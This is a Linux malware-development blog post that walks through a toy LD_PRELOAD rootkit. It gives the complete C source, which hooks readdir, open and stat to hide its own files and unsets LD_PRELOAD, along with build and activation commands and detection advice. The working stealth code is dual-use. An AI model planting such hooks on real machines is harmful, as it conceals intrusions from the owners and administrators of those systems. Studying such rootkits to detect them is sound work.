An Ld_preload Toy Rootkit

If you are not interested in malware development for Linux and have not read some of my previous blog posts, this blog post may be too technical for you. You could rather start here

In this blog post, I want to present a toy LD_PRELOAD rootkit. It works by hijacking the dynamic linker and thus hiding itself from the system. Later, we will talk about how to detect it.

Preliminaries

Usually, when an ELF file is executed, first the dynamic linker resolves the functions imported from other libraries. When a function such as open() is encountered by the linker and not defined in the binary itself, the linker searches for it in various places. The order of these places is documented in the man page of ld.so and is not that important in this exposition.

When the first instance of the function is encountered, it is used. The dynamic linker does not search further. In particular, if the function exists at multiple places, the first instance is used.

The idea of an LD_PRELOAD rootkit is that a malicious library – the rootkit – is placed before the legitimate libraries in the search order of the dynamic linker. This can be achieved, e.g., by exporting the full path of the rootkit with the command export LD_PRELOAD=<full path to rootkit>, or by tampering with /etc/ld.so.conf.

Then, legitimate function calls are hijacked by the rootkit. The rootkit can use these to hide its presence. Let me show you an example.

[user toykit]$ ls
README.md  toykit.c  toykit.so
[user toykit]$ gcc toykit.c -o toykit.so -fPIC -shared -ldl -D_GNU_SOURCE
[user toykit]$ export LD_PRELOAD=$(pwd)/toykit.so
[user toykit]$ ls
README.md
[user toykit]$ 
[user toykit]$ less toykit.c 
toykit.c: No such file or directory
[user toykit]$ cat toykit.c 
cat: toykit.c: No such file or directory

Here, the rootkit called toykit still exists in the directory, but cannot be seen. Toykit hooks various functions in glibc that are invoked by ls, less and cat. Internally, it executes the original functions, looks if its own name is in the output, and when that is the case it removes its own name and returns the cleaned output.

In our implementation, the files can still be seen by the shell completion, though that is only the case, because i apparently forgot to hook some more functions.

When executing ls with more debugging output, we can see the search order of the dynamic linker and that our rootkit is placed first. In the output below, the dynamic linker searches for the symbol _res, which is not implemented in toykit and hence the search continues at the other locations.

[user toykit]$ LD_DEBUG=symbols ls 2>&1 | head
symbol=__vdso_clock_gettime;  lookup in file=linux-vdso.so.1 [0]
symbol=__vdso_gettimeofday;  lookup in file=linux-vdso.so.1 [0]
symbol=__vdso_time;  lookup in file=linux-vdso.so.1 [0]
symbol=__vdso_getcpu;  lookup in file=linux-vdso.so.1 [0]
symbol=__vdso_clock_getres;  lookup in file=linux-vdso.so.1 [0]
symbol=_res;  lookup in file=ls [0]
symbol=_res;  lookup in file=/home/user/toykit/toykit.so [0]  <--- My rootkit is first in the library search order
symbol=_res;  lookup in file=/lib64/libselinux.so.1 [0]
symbol=_res;  lookup in file=/lib64/libcap.so.2 [0]
symbol=_res;  lookup in file=/lib64/libc.so.6 [0]

Source Code

Here is the commented source code of toykit. In a real rootkits, we could also have some malicious functionality, such as hiding of network sockets, malicious users, etc.

// gcc toykit.c -o toykit.so -fPIC -shared -ldl -D_GNU_SOURCE (-DDebug)

#include <stdio.h>
#include <dlfcn.h>
#include <string.h>
#include <dirent.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/stat.h>

 
#define HIDE_MAGIC "toykit"

// First and foremost, we remove the LD_PRELOAD to hide the presence
// of toykit. This removes it from env, but not from
// /proc/self/environ
static __attribute__((constructor)) void begin() {
    unsetenv("LD_PRELOAD");
}

// We hook readdir and remove files that start with HIDE_MAGIC
struct dirent *readdir(DIR *dirp) {
    struct dirent *(*orig_readdir)(DIR *dirp);
    orig_readdir = dlsym(RTLD_NEXT, "readdir");
    #ifdef DEBUG
    puts("readdir hooked");
    #endif

    struct dirent *dir;
    while ((dir = orig_readdir(dirp)) != NULL) {
        if(strstr(dir->d_name,HIDE_MAGIC) == 0) break;
    }
    return dir;
}

// We hook open and hide files that start with HIDE_MAGIC
int open(const char *pathname, int flags, mode_t mode) {
    int (*orig_open)(const char *pathname, int flags, mode_t mode);
    orig_open = dlsym(RTLD_NEXT, "open");
    #ifdef DEBUG
    printf("open hooked %s.\n", pathname);
    #endif

    if(strstr(pathname,HIDE_MAGIC) != NULL) {
      errno = ENOENT;
      return -1;
    }
    return orig_open(pathname, flags, mode);
}

int open64(const char *pathname, int flags, mode_t mode) {
    int (*orig_open64)(const char *pathname, int flags, mode_t mode);
    orig_open64 = dlsym(RTLD_NEXT, "open64");
    #ifdef DEBUG
    printf("open64 hooked %s.\n", pathname);
    #endif

    if(strstr(pathname,HIDE_MAGIC) != NULL) {
      errno = ENOENT;
      return -1;
    }
    return orig_open64(pathname, flags, mode);
}

// We hook stat and hide files that start with HIDE_MAGIC
// This is e.g., used by less
int stat(const char *pathname, struct stat *statbuf) {
    int (*orig_stat)(const char *pathname, struct stat *statbuf);
    orig_stat = dlsym(RTLD_NEXT, "stat");
    #ifdef DEBUG
    printf("stat hooked %s.\n", pathname);
    #endif

    if(strstr(pathname,HIDE_MAGIC) != NULL) {
      errno = ENOENT;
      return -1;
    }
    return orig_stat(pathname, statbuf);
}

int stat64(const char *pathname, struct stat64 *statbuf) {
    int (*orig_stat64)(const char *pathname, struct stat64 *statbuf);
    orig_stat64 = dlsym(RTLD_NEXT, "stat64");
    #ifdef DEBUG
    printf("stat64 hooked %s.\n", pathname);
    #endif

    if(strstr(pathname,HIDE_MAGIC) != NULL) {
      errno = ENOENT;
      return -1;
    }
    return orig_stat64(pathname, statbuf);
}

Detection

Detecting this approach is fairly simple, but let us first discuss approaches that will not work.

As shown above, we could check the library search path order of the dynamic linker for changes, e.g., suspicious entries in /etc/ld.so.config). This works in our toy rootkit, however, when the rootkit is even better, these investigations may not yield results, as they will use the hooked functions themselves. As an example, in the toy rootkit we removed the variable LD_PRELOAD that indicates presence of the rootkit. We could have taken this even further.

What will work is comparing the content of the disk (obtained using dd) with the file system itself. If there are files on the disk that are not shown in the file system, then maybe an LD_PRELOAD rootkit is hiding them. Note, that this comparison should not be done on the infected machine itself.

A second approach is using statically linked binaries. When executing a statically linked binary, there is no dynamic loader that can be hooked. The most common approach is probably using busybox. Hence, shell commands from within busybox cannot be hijacked by the rootkit and hence can be used for such a forensic analysis.

← Previous Archive Next →

Published

13 April 2025

Preliminaries

Source Code

Detection

Published

Category

Tags